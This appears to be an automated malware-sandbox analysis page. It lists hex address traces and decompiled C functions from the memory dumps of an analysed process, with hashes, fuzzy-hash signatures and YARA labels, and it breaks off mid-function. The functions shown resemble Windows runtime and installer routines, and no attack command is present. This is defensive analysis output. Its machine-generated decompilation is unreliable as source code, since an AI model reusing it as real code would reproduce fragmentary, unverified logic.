                                                                                                    0x00ab26c6
                                                                                                    0x00ab26c6
                                                                                                    0x00ab26c9
                                                                                                    0x00ab26c9
                                                                                                    0x00000000
                                                                                                    0x00ab26c9
                                                                                                    0x00ab26ba
                                                                                                    0x00ab265b
                                                                                                    0x00ab265b
                                                                                                    0x00ab265e
                                                                                                    0x00ab2667
                                                                                                    0x00ab266d
                                                                                                    0x00ab2677
                                                                                                    0x00ab267c
                                                                                                    0x00ab267f
                                                                                                    0x00ab2681
                                                                                                    0x00af5b49
                                                                                                    0x00af5b4e
                                                                                                    0x00ab27cd
                                                                                                    0x00ab27d0
                                                                                                    0x00ab27d1
                                                                                                    0x00ab27d2
                                                                                                    0x00ab27d4
                                                                                                    0x00ab27dd
                                                                                                    0x00ab2687
                                                                                                    0x00ab2687
                                                                                                    0x00ab268a
                                                                                                    0x00ab268b
                                                                                                    0x00ab268e
                                                                                                    0x00ab268f
                                                                                                    0x00ab2691
                                                                                                    0x00ab2696
                                                                                                    0x00ab2698
                                                                                                    0x00ab269d
                                                                                                    0x00ab269f
                                                                                                    0x00000000
                                                                                                    0x00ab269f
                                                                                                    0x00ab2681
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2846
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2605
                                                                                                    0x00ab260a
                                                                                                    0x00ab260c
                                                                                                    0x00ab2611
                                                                                                    0x00ab2616
                                                                                                    0x00ab2619
                                                                                                    0x00ab2619
                                                                                                    0x00ab261e
                                                                                                    0x00000000
                                                                                                    0x00ab2624
                                                                                                    0x00ab2627
                                                                                                    0x00ab2627
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5b1f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab2894
                                                                                                    0x00ab289b
                                                                                                    0x00ab289d
                                                                                                    0x00ab28a1
                                                                                                    0x00af5b2b
                                                                                                    0x00af5b2e
                                                                                                    0x00af5b2e
                                                                                                    0x00ab28a7
                                                                                                    0x00ab28a9
                                                                                                    0x00af5b04
                                                                                                    0x00af5b09
                                                                                                    0x00af5b09
                                                                                                    0x00af5b09
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af5b35
                                                                                                    0x00af5b3c
                                                                                                    0x00ab28fb
                                                                                                    0x00ab28fb
                                                                                                    0x00ab26cc
                                                                                                    0x00ab26cc
                                                                                                    0x00ab26d0
                                                                                                    0x00000000
                                                                                                    0x00ab26d2
                                                                                                    0x00ab26d2
                                                                                                    0x00000000
                                                                                                    0x00ab26d2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab25fe
                                                                                                    0x00ab292d
                                                                                                    0x00ab292f
                                                                                                    0x00ab2930
                                                                                                    0x00ab2935
                                                                                                    0x00ab2937
                                                                                                    0x00ab2938
                                                                                                    0x00ab293b
                                                                                                    0x00ab293c
                                                                                                    0x00ab293e
                                                                                                    0x00ab293f
                                                                                                    0x00ab2940
                                                                                                    0x00ab2942
                                                                                                    0x00ab2944
                                                                                                    0x00ab2947
                                                                                                    0x00ab2948
                                                                                                    0x00ab294e
                                                                                                    0x00ab294f
                                                                                                    0x00ab2950
                                                                                                    0x00ab2957
                                                                                                    0x00ab2958
                                                                                                    0x00ab295a
                                                                                                    0x00ab2962
                                                                                                    0x00ab2963
                                                                                                    0x00ab2964
                                                                                                    0x00ab2966
                                                                                                    0x00ab296c
                                                                                                    0x00ab296f
                                                                                                    0x00ab2972
                                                                                                    0x00ab2973
                                                                                                    0x00ab2974
                                                                                                    0x00ab297b
                                                                                                    0x00ab297e
                                                                                                    0x00ab297f
                                                                                                    0x00ab2980
                                                                                                    0x00ab2981
                                                                                                    0x00ab2982
                                                                                                    0x00ab2983
                                                                                                    0x00ab2984
                                                                                                    0x00ab2985
                                                                                                    0x00ab2986
                                                                                                    0x00ab2987
                                                                                                    0x00ab2988
                                                                                                    0x00ab2989
                                                                                                    0x00ab298a
                                                                                                    0x00ab298b
                                                                                                    0x00ab298c
                                                                                                    0x00ab298d
                                                                                                    0x00ab298e
                                                                                                    0x00ab298f
                                                                                                    0x00ab2990
                                                                                                    0x00ab2992
                                                                                                    0x00ab2997
                                                                                                    0x00ab29a3
                                                                                                    0x00ab29a6
                                                                                                    0x00ab29ab
                                                                                                    0x00ab29ad
                                                                                                    0x00ab29b0
                                                                                                    0x00ab29b2
                                                                                                    0x00af5c80
                                                                                                    0x00ab29b8
                                                                                                    0x00ab29b8
                                                                                                    0x00ab29bb
                                                                                                    0x00ab29c0
                                                                                                    0x00ab29c5
                                                                                                    0x00ab29c6
                                                                                                    0x00ab29c6
                                                                                                    0x00ab29c9
                                                                                                    0x00ab29cb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ab29cd
                                                                                                    0x00ab29d0
                                                                                                    0x00ab29d9
                                                                                                    0x00ab29db
                                                                                                    0x00ab29dd
                                                                                                    0x00ab2a7f
                                                                                                    0x00ab2a84
                                                                                                    0x00ab2a87
                                                                                                    0x00ab2a89
                                                                                                    0x00af5ca1
                                                                                                    0x00af5ca3
                                                                                                    0x00000000
                                                                                                    0x00ab2a8f
                                                                                                    0x00ab2a8f
                                                                                                    0x00000000
                                                                                                    0x00ab2a8f
                                                                                                    0x00000000
                                                                                                    0x00ab29e3
                                                                                                    0x00ab29e3
                                                                                                    0x00ab29e3
                                                                                                    0x00000000
                                                                                                    0x00ab29e3
                                                                                                    0x00ab29dd
                                                                                                    0x00000000
                                                                                                    0x00ab29db
                                                                                                    0x00ab29e6
                                                                                                    0x00ab29e9
                                                                                                    0x00ab29eb
                                                                                                    0x00ab29ed
                                                                                                    0x00ab29f3
                                                                                                    0x00ab29f5
                                                                                                    0x00ab29f8
                                                                                                    0x00ab29fa
                                                                                                    0x00ab2a97
                                                                                                    0x00ab2a9a
                                                                                                    0x00ab2a9d
                                                                                                    0x00ab2add
                                                                                                    0x00000000
                                                                                                    0x00ab2a9f
                                                                                                    0x00ab2aa2
                                                                                                    0x00ab2aa5
                                                                                                    0x00ab2aa8
                                                                                                    0x00ab2aab
                                                                                                    0x00af5cab
                                                                                                    0x00af5caf
                                                                                                    0x00af5cc5
                                                                                                    0x00af5cda
                                                                                                    0x00af5cdc
                                                                                                    0x00af5cdf
                                                                                                    0x00af5ce5
                                                                                                    0x00000000
                                                                                                    0x00af5ceb
                                                                                                    0x00af5ced
                                                                                                    0x00af5cee
                                                                                                    0x00000000
                                                                                                    0x00af5cee
                                                                                                    0x00af5cb1
                                                                                                    0x00af5cb4
                                                                                                    0x00af5cb9
                                                                                                    0x00af5cbb
                                                                                                    0x00000000
                                                                                                    0x00af5cbd
                                                                                                    0x00af5cbd
                                                                                                    0x00000000
                                                                                                    0x00af5cbd
                                                                                                    0x00af5cbb
                                                                                                    0x00ab2ab1
                                                                                                    0x00ab2ab1
                                                                                                    0x00ab2ac4
                                                                                                    0x00ab2ac6
                                                                                                    0x00ab2ac6
                                                                                                    0x00000000
                                                                                                    0x00ab2ac6
                                                                                                    0x00ab2aab
                                                                                                    0x00000000
                                                                                                    0x00ab2a00
                                                                                                    0x00ab2a09
                                                                                                    0x00ab2a0e
                                                                                                    0x00ab2a21
                                                                                                    0x00ab2a24
                                                                                                    0x00ab2a35
                                                                                                    0x00ab2a3a
                                                                                                    0x00ab2a3d
                                                                                                    0x00ab2a42
                                                                                                    0x00ab2a59
                                                                                                    0x00ab2a59
                                                                                                    0x00ab2a5c
                                                                                                    0x00ab2a5f
                                                                                                    0x00ab2a5f
                                                                                                    0x00ab29fa
                                                                                                    0x00ab29f3
                                                                                                    0x00ab2a64
                                                                                                    0x00ab2a64
                                                                                                    0x00ab2a6b
                                                                                                    0x00ab2a6b
                                                                                                    0x00ab2a6d
                                                                                                    0x00ab2a72
                                                                                                    0x00ab2a72
                                                                                                    0x00000000

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PATH
                                                                                                    • API String ID: 0-1036084923
                                                                                                    • Opcode ID: 29314f0919670f347306b6fc254092e20bcea3caca86a95b8a98b544327ad313
                                                                                                    • Instruction ID: 16216ca0713dfd187fa974bae8a4b7300a2294ae62e6b333518c495759b21df9
                                                                                                    • Opcode Fuzzy Hash: 29314f0919670f347306b6fc254092e20bcea3caca86a95b8a98b544327ad313
                                                                                                    • Instruction Fuzzy Hash: B4C19D71E00219AFCB24DFA9D981BEDB7B9FF48700F14402AE505BB252EB74A941CB64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A8C962, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 42%
                                                                                                    			E00A8C962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0xb7d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E00A9EEF0(0xb770a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E00B0F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E00A9EB70(_t29, 0xb770a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E00ACB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E00B0F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0xb770c0; // 0x0
					while(_t38 != 0xb770c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0xb7b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                    0x00a8c96a
                                                                                                    0x00a8c974
                                                                                                    0x00a8c988
                                                                                                    0x00a8c98a
                                                                                                    0x00af7c9d
                                                                                                    0x00af7c9f
                                                                                                    0x00af7ca4
                                                                                                    0x00af7cae
                                                                                                    0x00af7cf0
                                                                                                    0x00af7cf5
                                                                                                    0x00af7cfa
                                                                                                    0x00a8c992
                                                                                                    0x00a8c996
                                                                                                    0x00a8c997
                                                                                                    0x00a8c998
                                                                                                    0x00a8c9a3
                                                                                                    0x00a8c9a3
                                                                                                    0x00af7cb0
                                                                                                    0x00af7cb7
                                                                                                    0x00af7cbb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af7cbd
                                                                                                    0x00af7ce8
                                                                                                    0x00af7cc5
                                                                                                    0x00af7cc8
                                                                                                    0x00af7cca
                                                                                                    0x00af7cd0
                                                                                                    0x00af7cd6
                                                                                                    0x00af7cde
                                                                                                    0x00af7ce4
                                                                                                    0x00af7ce4
                                                                                                    0x00af7cd0
                                                                                                    0x00000000
                                                                                                    0x00af7ce8
                                                                                                    0x00a8c990
                                                                                                    0x00000000

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a61f5048e7a3ef12cfeacc2ad91faf5c6f15dce42c99084e60460fdf326783e3
                                                                                                    • Instruction ID: a9e98e50bc529eca0630717683e37b7384e642e5cd447dbd162725f6bc8a6d5b
                                                                                                    • Opcode Fuzzy Hash: a61f5048e7a3ef12cfeacc2ad91faf5c6f15dce42c99084e60460fdf326783e3
                                                                                                    • Instruction Fuzzy Hash: F111E53130860A9BCB10EF68CC46A7BB7F5BB84714B110579F945936A1DF20EC55CBD1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 39%
                                                                                                    			E0040263E(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AC4(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B66();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                                                    0x00402656
                                                                                                    0x0040266a
                                                                                                    0x00402675
                                                                                                    0x00402676
                                                                                                    0x004027b1
                                                                                                    0x00402658
                                                                                                    0x00402658
                                                                                                    0x0040265a
                                                                                                    0x0040265c
                                                                                                    0x0040265c
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: d45b7fb574bd10bd2ad077725b1acfadfb6912ed7db7981a5c9124aac54e8080
                                                                                                    • Instruction ID: b3d2387cb92b068db8966d6a1439c3c253679041c8135bb289436d91baf53d0e
                                                                                                    • Opcode Fuzzy Hash: d45b7fb574bd10bd2ad077725b1acfadfb6912ed7db7981a5c9124aac54e8080
                                                                                                    • Instruction Fuzzy Hash: 42F0A072A04201DBD700EBB49A89AEEB7789B51328F60067BE111F20C1C6B85A459B2E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A82D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 63%
                                                                                                    			E00A82D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0xb75350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0xb77bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00AC97C0();
				}
				if( *0xb779c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0xb779c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00AB1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00AA7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00B1FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00AC9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00ABE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E00ADDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xb76901;
								_push(_t109);
								_v52 = _t98;
								if( *0xb76901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00AC9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00AC95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00AA7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00AA7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00B07016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00B1FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xb75350;
							if(_t109 != 0xb75350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00B1FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00B15720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                    0x00a82d8a
                                                                                                    0x00a82d8a
                                                                                                    0x00a82d92
                                                                                                    0x00a82d96
                                                                                                    0x00a82d9e
                                                                                                    0x00a82da0
                                                                                                    0x00a82da3
                                                                                                    0x00a82da5
                                                                                                    0x00a82da8
                                                                                                    0x00a82dab
                                                                                                    0x00a82db2
                                                                                                    0x00adf9aa
                                                                                                    0x00adf9ab
                                                                                                    0x00adf9ae
                                                                                                    0x00adf9ae
                                                                                                    0x00a82db8
                                                                                                    0x00a82dc2
                                                                                                    0x00adf9b9
                                                                                                    0x00adf9be
                                                                                                    0x00adf9bf
                                                                                                    0x00adf9bf
                                                                                                    0x00a82dcf
                                                                                                    0x00adf9c9
                                                                                                    0x00a82dd5
                                                                                                    0x00a82dd5
                                                                                                    0x00a82dd5
                                                                                                    0x00a82dde
                                                                                                    0x00a82de1
                                                                                                    0x00a82e70
                                                                                                    0x00a82e72
                                                                                                    0x00a82e72
                                                                                                    0x00a82de7
                                                                                                    0x00a82deb
                                                                                                    0x00a82e7c
                                                                                                    0x00a82e83
                                                                                                    0x00a82e85
                                                                                                    0x00a82e8b
                                                                                                    0x00a82e8d
                                                                                                    0x00a82e92
                                                                                                    0x00a82e92
                                                                                                    0x00a82e85
                                                                                                    0x00a82df1
                                                                                                    0x00a82df7
                                                                                                    0x00a82df9
                                                                                                    0x00a82df9
                                                                                                    0x00a82dfc
                                                                                                    0x00a82dff
                                                                                                    0x00a82e02
                                                                                                    0x00000000
                                                                                                    0x00a82e05
                                                                                                    0x00a82e0c
                                                                                                    0x00adf9d9
                                                                                                    0x00a82e12
                                                                                                    0x00a82e12
                                                                                                    0x00a82e12
                                                                                                    0x00a82e1a
                                                                                                    0x00adf9e3
                                                                                                    0x00adf9e9
                                                                                                    0x00adf9f0
                                                                                                    0x00adf9f6
                                                                                                    0x00adf9f8
                                                                                                    0x00adf9f8
                                                                                                    0x00adf9f0
                                                                                                    0x00a82e23
                                                                                                    0x00adfa02
                                                                                                    0x00adfa03
                                                                                                    0x00adfa05
                                                                                                    0x00adfa06
                                                                                                    0x00000000
                                                                                                    0x00a82e29
                                                                                                    0x00a82e29
                                                                                                    0x00a82e2e
                                                                                                    0x00a82e34
                                                                                                    0x00a82e3e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a82e44
                                                                                                    0x00a82e47
                                                                                                    0x00a82e4d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a82e4f
                                                                                                    0x00a82e54
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a82e5a
                                                                                                    0x00a82e5f
                                                                                                    0x00a82e9a
                                                                                                    0x00a82ea4
                                                                                                    0x00a82ea5
                                                                                                    0x00a82ea8
                                                                                                    0x00a82eaf
                                                                                                    0x00a82eb2
                                                                                                    0x00a82eb5
                                                                                                    0x00adfae9
                                                                                                    0x00adfaeb
                                                                                                    0x00adfaed
                                                                                                    0x00adfaef
                                                                                                    0x00adfaf7
                                                                                                    0x00adfaf8
                                                                                                    0x00adfafd
                                                                                                    0x00adfaff
                                                                                                    0x00adfb04
                                                                                                    0x00adfb04
                                                                                                    0x00adfaff
                                                                                                    0x00a82ec0
                                                                                                    0x00a82ec4
                                                                                                    0x00a82ec6
                                                                                                    0x00a82ec8
                                                                                                    0x00adfb14
                                                                                                    0x00adfb18
                                                                                                    0x00adfb1e
                                                                                                    0x00adfb21
                                                                                                    0x00adfb21
                                                                                                    0x00a82ece
                                                                                                    0x00a82ece
                                                                                                    0x00a82ece
                                                                                                    0x00a82ed7
                                                                                                    0x00a82e61
                                                                                                    0x00a82e63
                                                                                                    0x00adfa6b
                                                                                                    0x00adfa71
                                                                                                    0x00adfa76
                                                                                                    0x00adfa78
                                                                                                    0x00adfa8a
                                                                                                    0x00adfa7a
                                                                                                    0x00adfa83
                                                                                                    0x00adfa83
                                                                                                    0x00adfa8f
                                                                                                    0x00adfa91
                                                                                                    0x00adfa97
                                                                                                    0x00adfa9d
                                                                                                    0x00adfaa4
                                                                                                    0x00adfaaa
                                                                                                    0x00adfaaf
                                                                                                    0x00adfab1
                                                                                                    0x00adfac3
                                                                                                    0x00adfab3
                                                                                                    0x00adfabc
                                                                                                    0x00adfabc
                                                                                                    0x00adfac8
                                                                                                    0x00adfacb
                                                                                                    0x00adfadf
                                                                                                    0x00adfadf
                                                                                                    0x00adfacb
                                                                                                    0x00adfaa4
                                                                                                    0x00adfa91
                                                                                                    0x00a82e6f
                                                                                                    0x00a82e6f
                                                                                                    0x00a82e5f
                                                                                                    0x00adfa13
                                                                                                    0x00adfa15
                                                                                                    0x00adfa17
                                                                                                    0x00adfa1f
                                                                                                    0x00adfa21
                                                                                                    0x00adfa22
                                                                                                    0x00adfa25
                                                                                                    0x00adfa28
                                                                                                    0x00adfa2f
                                                                                                    0x00adfa2f
                                                                                                    0x00adfa2a
                                                                                                    0x00adfa2a
                                                                                                    0x00adfa2a
                                                                                                    0x00adfa31
                                                                                                    0x00adfa34
                                                                                                    0x00adfa36
                                                                                                    0x00adfa3c
                                                                                                    0x00adfa3e
                                                                                                    0x00adfa41
                                                                                                    0x00adfa43
                                                                                                    0x00adfa45
                                                                                                    0x00adfa45
                                                                                                    0x00adfa41
                                                                                                    0x00adfa3c
                                                                                                    0x00adfa4a
                                                                                                    0x00adfa4f
                                                                                                    0x00adfa51
                                                                                                    0x00adfa53
                                                                                                    0x00adfa56
                                                                                                    0x00adfa5b
                                                                                                    0x00adfa5e
                                                                                                    0x00000000
                                                                                                    0x00adfa5e
                                                                                                    0x00a82e23

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RTL: Re-Waiting
                                                                                                    • API String ID: 0-316354757
                                                                                                    • Opcode ID: 062e4d6934eb7fd665745a91dff37c6ea604a9cdc2452ac01a7158f9ac7248bc
                                                                                                    • Instruction ID: 3fb9095af6864cb658ef1cd15c1a2423e19f95bdaeec781197f025081e123036
                                                                                                    • Opcode Fuzzy Hash: 062e4d6934eb7fd665745a91dff37c6ea604a9cdc2452ac01a7158f9ac7248bc
                                                                                                    • Instruction Fuzzy Hash: 76610131A00644AFDB21EB68C884B7FBBF5EB44754F2446AAE8179B3D1CB349D41C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B50EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 80%
                                                                                                    			E00B50EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00B4FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00B51074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00AC9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00B4A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00B4A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xb78b04 >> 0x14) + (_v44 -  *0xb78b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00AA7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
